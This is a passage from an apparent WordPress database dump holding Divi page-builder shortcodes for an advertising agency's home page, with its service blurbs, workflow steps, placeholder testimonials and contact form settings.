text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-04 18:46:59','2020-08-04 18:46:59','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/134-revision-v1/',0,'revision','',0),(391,1,'2020-08-04 18:48:36','2020-08-04 18:48:36','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" alt=\"Video digital advertising\" title_text=\"Screenshot 2020-07-19 at 2.05.17 AM\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve 